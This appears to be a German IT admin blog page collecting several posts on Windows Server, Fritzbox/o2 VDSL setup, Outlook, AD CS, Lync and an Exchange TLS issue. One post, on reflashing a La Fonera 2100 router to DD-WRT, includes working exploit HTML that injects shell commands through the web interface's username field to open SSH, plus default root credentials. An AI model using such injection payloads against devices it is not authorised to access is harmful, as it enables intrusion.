Windows Server 2012 – RDP Session Kennwort ändern

Hi,

wer kennt die Situation nicht, man ist in einer RDP Session auf einem Windows Server 2012 (R2) und muss sein Kennwort ändern.
Bekannt von Windows Server 2008 R2, ist Windows Security eintrag im Starmenü, den gibt es bei Server 2012 (R2) nicht mehr.

Daher als Tastenkombination Strg + Alt + End drücken und dann Passwort ändern:

win2012-strg-alt-end-pw-change
win2012-strg-alt-end-pw-change

Das als Gedankenstütze.

CU

Advertisements

La Fonera 2100 Router hacken – DD-WRT

Hi,

ich hatte noch einen FON La Fonera 2100 Router rumliegen, der in der Vergangenheit ein internes Gäste-WLAN (WPA2 gesichert) und ein offenes FON-Hotspot Signal ausgestrahlt hat.

Fonera2100
Wie ich erst jetzt mitbekommen habe, hat FON den Support für den 2100 und die Hotspots abgekündigt, womit der Router nicht mehr benötigt. Aufgrund der Telekom Hotspot Flatrate kann ich mich auch an den neuen „TELEKOM_FON“ Hotspots anmelden. Weiterhin sendet meine Fritz!Box7490 jetzt ein internes und ein gesichertes Gäste-WLAN aus. Daher war die 2100 frei und ich wollte den Router als Repeater einsetzen, was mit dem freien Router OS DD-WRT funktionieren sollte.

Dazu musste ich erstmal viele Informationen Sammeln, zudem gab es z.t. widersprüchliche Informationen und Anleitungen (Vorbereitungen, Reset, Downgrade und weitere Schritte NACH SSH und SSH aktivieren). Hier meine Erfahrungen:

Meine Fonera 2100 war auch dem neuesten FON-OS 0.7.1r3. Damit musste erstmal ein Reset der Fonera machen. Dazu den Router vom LAN trennen und ca. 30s den Reset Knopf am Boden des Routers drücken.

Fonera2100-reset

Danach ca. 1-2min. warten und dann per LAN direkt vom Rechner zur Fonera verbinden. Dazu muss dem Rechner eine feste IP vergeben werden:
IP: 169.254.255.2
Subnet: 255.255.0.0 (System füllt automatisch)
Default Gateway: 169.254.255.1
DNS: 169.254.255.1

Fonera2100-rechnerip169

Jetzt kann man im Browser die IP der Fonera aufrufen http://169.254.255.1 und erhält die Fonera GUI zu sehen, sowie einen Login:
Username: root
Password: admin
eingeben.

Fonera2100-gui-start071r1

Die GUI sollte als Version „0.7.1 r1“ ausgeben, somit die Vorrausetzung für den „SSH Hack“ gegeben sind.

Jetzt folgenden folgenden Code als „step1.html“ auf der Festplatte speichern:

<html>
<head>
<title>Step 1-2 to open SSH-access to La Fonera</title>
</head>
<body>
<center>
<h1>Open SSH-access to La Fonera</h1>
(Model: FON2100A/B/C & FON2200)
<h2>Works with firmware 0.7.0r4 up to 0.7.1r1</h2>
<h3>Step 1 of 2 for connection via LAN</h3>
<form method="post" action="http://169.254.255.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT)" size="60">
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='&quot;;' + this.form.wifimode.value +';&quot;'}">
</form>
</center>
</body>
</html>

Ebenso diesen Code als als „step2.html“ auf der Festplatte speichern:

<html>
<head>
<title>Step 2-2 to open SSH-access to La Fonera</title>
</head>
<body>
<center>
<h1>Open SSH-access to La Fonera</h1>
(Model: FON2100A/B/C & FON2200)
<h2>Works with firmware 0.7.0r4 up to 0.7.1r1</h2>
<h3>Step 2 of 2 for connection via LAN</h3>
<form method="post" action="http://169.254.255.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/etc/init.d/dropbear)" size="60">
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='&quot;;' + this.form.wifimode.value +';&quot;'}">
</form>
</center>
</body>
</html>

Dann im Browser die „step1.html“ suchen und ausführen (ACHTUNG: IE lokale Skripte erlauben! Firefox NoScript erlauben)

Fonera2100-ssh-step1

Danach im Browser die „step2.html“ suchen und ebenfalls ausführen

Fonera2100-ssh-step2

 

o2 DSL und Fritzbox 7390

Hi,

seit letzter Woche wurde mein o2 DSL Anschluss auf VDSL (50Mbit) umgestellt. Dazu wurde die o2 Homebox 6641 mitgeliefert. Die war in nur 2 Minuten auch in Betrieb und nach Eingabe des PIN auch online. Aber es konnte keine Internet Verbindung hergestellt werden. Weder per LAN noch per WLAN. Nach 4 Telefonaten mit der o2 Hotline dann spät abends noch die Lösung vom Techniker: Da ich noch eine feste IP vom alten (Hansenet) Alice DSL Anschluss hatte, musste diese feste IP weg und siehe da ich war komplett online. Surfen und per VOIP telefonieren war möglich!

Der Techniker war so freundlich und fragte mich wie ich zuvor online war und ich sagte Ihm, dass ich eine Fritzbox 7390 genutzt habe. Er sagte dann, dass es auch möglich ist, die Fritzbox 7390 als Router an dem VDSL Anschluss zu betreiben und sendete mir die Internet-Zugangsdaten per SMS.

Dieses Wochenende habe ich dann die Fritzbox 7390 wieder in Betrieb genommen und erstmal das neueste FRITZ!OS: 6.36-31922 aus dem AVM Fritz!Labor aufgespielt. Danach dann die per SMS erhaltenen Zugangsdaten fürs Internet eintragen:

  • Internet ->Zugangsdaten:
  • Benutzername: Vorwahl+Rufnummer@s93.bbi-o2.de (Bsp: 04012345678@s93.bbi-o2.de)
  • Kennwort: kennwortpersms (10-stellig)
fritzbox7390-zugangsdaten-o2vdsl
fritzbox7390-zugangsdaten-o2vdsl

So mit war die Fritzbox schon mal online

fritzbox7390-online-monitor
fritzbox7390-online-Monitor

Jetzt nur noch rausfinden wie man telefonieren kann und wo man die VOIP Daten herbekommt und wie diese eingetragen werden müssen. Nach langem suchen bin ich dann im Forum fündig geworden:

  • Telefonie – Eigene Rufnummern
    • Neue Rufnummer auswählen
    • Internetrufnummer verwenden aktivieren
      • Telefonie-Anbieter: sip.alice-voip.de
      • Internetrufnummer: AmtsNummerOhneVorwahl (Bsp.: 1234567)
      • Rufnummer ohne Vorwahl: AmtsNummerOhneVorwahl (Bsp.: 1234567)
      • Zugangsdaten:
        • Benutzername: AmtsNummerMit49erVorwahl  (Bsp.: 49401234567)
        • Kennwort: vonO2dasKennworterfragen
        • Registrar: sip.alice-voip.de
        • Proxy-Server: sip.alice-voip.de
        • STUN-Server: -freilassen-
fritzbox7390-telefonie-rufnummern
fritzbox7390-telefonie-rufnummern
  • Telefonie – Eigene Rufnummern – Anschlusseinstellungen
    • Standortangaben: Land Deutschland; Landesvorwahl 00 49; Ortsvorwahl 0 40 (40 für Hamburg in meinem Fall)
    • Festnetz aktiv: deaktiviert lassen
    • Ausgehende Rufnummer: dieNummer,dieimletztenSchritteingrichetwurde (Bsp.: 1234567)
    • Sprachpakete: Weitere Verbindung für die Internettelefonie über DSL nutzen (PVC) deaktiviert (VPI 1, VCI 32)
fritzbox7390-telefonie-anschlusseinstellungen
fritzbox7390-telefonie-anschlusseinstellungen

Danach ist man auch mit der VOIP Telefonie online!

fritzbox7390-telefonie-rufnummern1
fritzbox7390-telefonie-rufnummern1

Nichts desto trotz habe ich mir jetzt auch eine Fritz!Box 7490 geholt, die VOIP Daten nach Eingabe der Internet Einstellung automatisch per TP69 von o2 abgerufen hat. Meine 7390 habe ich verkauft.

Na dann, Viel spass und das Testen nicht vergessen!
CU

Outlook 2013 Ordnerliste leer nach Windows Updates September 2013

Hi,

nach dem installieren der Windows Updates September 2013 habe ich plötzlich keine Ordnerliste mehr in Outlook 2013.

outlook2013-ordnerliste-leer
outlook2013-ordnerliste-leer

Das Problem wird Bereits auch im TechNet Forum diskutiert und als Problem bestätigt.

Die Updates KB2810009 und KB2817630 sind wohl die Übeltäter und eine Desinstallation der Updates hilft damit das Problem nicht auftritt. Die Updates wurden von Microsoft wohl auch schon zurück gezogen.

[UPDATE:] Dazu auch aus dem Microsoft Office Blog Team ein Beitrag, Outlook 2013 Folder Pane Disappears After Installing September 2013 Public Update.

Na dann, Viel Spass beim selber Testen!
CU

AD CS Certificate Authority Web Enrollment certsrv nicht verfügbar

Hi,

 

nach dem In-Place Upgrade unserer Enterprise CA von Windows Server 2008 R2 auf Windows Server 2012 war das AD CS Certificate Authority Web Enrollment (http://caservername/certsrv) nicht mehr verfügbar. Also auch im IIS war kein Web oder Verzeichnis zu sehen.

ad-cs-certsrv-missing
ad-cs-certsrv-missing

Lösung war die Reinstallation des Rollendienstes AD CS Certificate Authority Web Enrollment

server-manger-remove-roles-features  server-manger-remove-roles-feature-ad-cs

Dann konnte man auch wieder im IIS das Web sehen

ad-cs-certsrv
ad-cs-certsrv

und per Browser auf die CA zugreifen

ad-cs-http-certsrv
ad-cs-http-certsrv

Na dann, Viel Spass beim selber Testen!
CU

Lync 2013 Client – Microsoft Office kann den

Hi,

ich hatte heute einen Fehler beim Start vom Lync (Desktop) Client, da erhalte ich den fehler: Lync Client „Microsoft Office kann die Lizenz nicht überprüfen. Reparieren Sie das Office Programm über die Systemsteuerung.“

lync-office-lizenz-error
lync-office-lizenz-error

Das MS Office Pro ist aber mit VLK aktiviert!

Nur zufällig habe ich die Lösung rausgefunden:

Ich hatte die Verknüpfung vom Lync auf Kompatibilitätsmodus – Windows 7 stehen,

lync-kompatibiliaet-win7
lync-kompatibiliaet-win7

damit ich das Symbol nicht mehr in der Task/Superbar, sondern nur im Taskbereich unten rechts habe.

Nehme ich den Kompatibilitätsmodus raus oder stelle auf Windows Vista funktioniert der Lync Client wieder ohne Lizenzfehlermeldung.

Na dann, Viel Spass beim selber Testen!
CU

 

Exchange secure TLS connection could not be established

Hi,

unser SCOM meldete ein Problem auf unserem Exchange Server, ein Send-Connector hatte Problem beim Empfang von Emails mit der TLS Verbindung. Der Exchange Server (2010 SP3 UR1) hatte dann auch diverse Eventlog Einträge:

A secure connection to domain-secured domain ‚kundendomain.de‘ on connector ‚Internet Mail SMTP (EX2010-1)‘ could not be established because the validation of the Transport Layer Security (TLS) certificate for kundendomain.de failed with status ‚UntrustedRoot. Contact the administrator of kundedomain.de to resolve the problem, or remove the domain from the domain-secured list.

Der Fehler lies sich auf im SMTP-Recieve Log genauer nachvollziehen:

2013-07-02T00:00:13.216Z,ex2010-1\SMTP,08D03639B8BBE13F,15,10.1.2.3:25,123.456.789.10:13322,>,220 2.0.0 SMTP server ready,
2013-07-02T00:00:13.216Z,ex2010-1\SMTP,08D03639B8BBE13F,16,10.1.2.3:25,123.456.789.10:13322,*,,Sending certificate
2013-07-02T00:00:13.216Z,ex2010-1\SMTP,08D03639B8BBE13F,17,10.1.2.3:25,123.456.789.10:13322,*,“CN=mail.WIRdomain.de, OU=IT, O=WIR GmbH, L=Stadt, S=““““, C=DE, SERIALNUMBER=9jdU6QQyv3BEg/AadaIO/pbD2ZT4gtdw“,Certificate subject
2013-07-02T00:00:13.216Z,ex2010-1\SMTP,08D03639B8BBE13F,18,10.1.2.3:25,123.456.789.10:13322,*,“CN=GeoTrust SSL CA, O=““GeoTrust, Inc.““, C=US“,Certificate issuer name
2013-07-02T00:00:13.216Z,ex2010-1\SMTP,08D03639B8BBE13F,19,10.1.2.3:25,123.456.789.10:13322,*,01332C,Certificate serial number
2013-07-02T00:00:13.216Z,ex2010-1\SMTP,08D03639B8BBE13F,20,10.1.2.3:25,123.456.789.10:13322,*,306306CD1B566DF1663165FCE9C3897B9BCEB89D7AA,Certificate thumbprint
2013-07-02T00:00:13.216Z,ex2010-1\SMTP,08D03639B8BBE13F,21,10.1.2.3:25,123.456.789.10:13322,*,mail.WIRdomain.de;autodiscover.WIRdomain.de;smtp.WIRdomain.de,Certificate alternate names
2013-07-02T00:00:13.310Z,ex2010-1\SMTP,08D03639B8BBE13F,22,10.1.2.3:25,123.456.789.10:13322,*,,Received certificate
2013-07-02T00:00:13.310Z,ex2010-1\SMTP,08D03639B8BBE13F,23,10.1.2.3:25,123.456.789.10:13322,*,C025E0C35B3B93DEE21CC2E9477AF4E56047BD0C,Certificate thumbprint
2013-07-02T00:00:13.310Z,ex2010-1\SMTP,08D03639B8BBE13F,24,10.1.2.3:25,123.456.789.10:13322,*,SMTPSubmit SMTPAcceptAnySender SMTPAcceptAuthoritativeDomainSender AcceptRoutingHeaders,Set Session Permissions
2013-07-02T00:00:13.326Z,ex2010-1\SMTP,08D03639B8BBE13F,25,10.1.2.3:25,123.456.789.10:13322,<,EHLO smtp.kundendomain.de,
2013-07-02T00:00:13.326Z,ex2010-1\SMTP,08D03639B8BBE13F,26,10.1.2.3:25,123.456.789.10:13322,*,,TlsDomainCapabilities=’None‘; Status=’Success‘; Domain=“
2013-07-02T00:00:13.326Z,ex2010-1\SMTP,08D03639B8BBE13F,27,10.1.2.3:25,123.456.789.10:13322,>,250-smtp.WIRdomain.de Hello [123.456.789.10],
2013-07-02T00:00:13.326Z,ex2010-1\SMTP,08D03639B8BBE13F,28,10.1.2.3:25,123.456.789.10:13322,>,250-SIZE 51445760,
2013-07-02T00:00:13.326Z,ex2010-1\SMTP,08D03639B8BBE13F,29,10.1.2.3:25,123.456.789.10:13322,>,250-PIPELINING,
2013-07-02T00:00:13.326Z,ex2010-1\SMTP,08D03639B8BBE13F,30,10.1.2.3:25,123.456.789.10:13322,>,250-DSN,
2013-07-02T00:00:13.326Z,ex2010-1\SMTP,08D03639B8BBE13F,31,10.1.2.3:25,123.456.789.10:13322,>,250-ENHANCEDSTATUSCODES,
2013-07-02T00:00:13.326Z,ex2010-1\SMTP,08D03639B8BBE13F,32,10.1.2.3:25,123.456.789.10:13322,>,250-AUTH,
2013-07-02T00:00:13.326Z,ex2010-1\SMTP,08D03639B8BBE13F,33,10.1.2.3:25,123.456.789.10:13322,>,250-8BITMIME,
2013-07-02T00:00:13.326Z,ex2010-1\SMTP,08D03639B8BBE13F,34,10.1.2.3:25,123.456.789.10:13322,>,250-BINARYMIME,
2013-07-02T00:00:13.326Z,ex2010-1\SMTP,08D03639B8BBE13F,35,10.1.2.3:25,123.456.789.10:13322,>,250 CHUNKING,
2013-07-02T00:00:13.357Z,ex2010-1\SMTP,08D03639B8BBE13F,36,10.1.2.3:25,123.456.789.10:13322,<,MAIL FROM:<vorname.nachname@kundendomain.de> SIZE=16517,
2013-07-02T00:00:13.357Z,ex2010-1\SMTP,08D03639B8BBE13F,37,10.1.2.3:25,123.456.789.10:13322,*,,Client certificate chain validation status: ‚UntrustedRoot‘
2013-07-02T00:00:13.357Z,ex2010-1\SMTP,08D03639B8BBE13F,38,10.1.2.3:25,123.456.789.10:13322,*,Tarpit for ‚0.00:00:05‘,
2013-07-02T00:00:18.371Z,ex2010-1\SMTP,08D03639B8BBE13F,39,10.1.2.3:25,123.456.789.10:13322,>,454 4.7.5 Certificate validation failure,
2013-07-02T00:00:18.371Z,ex2010-1\SMTP,08D03639B8BBE13F,40,10.1.2.3:25,123.456.789.10:13322,<,RCPT TO:<vnachname@WIRdomain.de>,
2013-07-02T00:00:18.371Z,ex2010-1\SMTP,08D03639B8BBE13F,41,10.1.2.3:25,123.456.789.10:13322,*,Tarpit for ‚0.00:00:05‘,
2013-07-02T00:00:23.385Z,ex2010-1\SMTP,08D03639B8BBE13F,42,10.1.2.3:25,123.456.789.10:13322,>,503 5.5.2 Need mail command,
2013-07-02T00:00:23.385Z,ex2010-1\SMTP,08D03639B8BBE13F,43,10.1.2.3:25,123.456.789.10:13322,<,QUIT,
2013-07-02T00:00:23.385Z,ex2010-1\SMTP,08D03639B8BBE13F,44,10.1.2.3:25,123.456.789.10:13322,>,221 2.0.0 Service closing transmission channel,

Das Problem war, dass der Kunde sein Internes SAN-Zertifikat zusätzlich auch am SMTP Service zugewiesen hatte. Dadurch wurde dieses interne Zertifikat von seiner internen ROOT CA als Authentifizierung, per TLS gegenüber unserem Exchange benutzt.

exchange-certs
exchange-certs

LÖSUNG: Da wir aber dem internen ROOT CA Cert seiner CA nicht vertrauen funktionierte der Mailversand bei Ihm und Empfang über unseren Recieve-Connector nicht mehr. Da aber ein öffentliches SAN-Zertifikat vorhanden ist und auch an dem SMTP-Service hängt wurde das interne SAN-Zertifikat vom SMTP-Service entfernt.

Somit funktionierte auch der E-Mail Versand zwischen dem Kunden und uns wieder mit TLS Verschlüsselung zwischen den Exchange Servern.

Na dann, Viel Spass beim selber Testen!
CU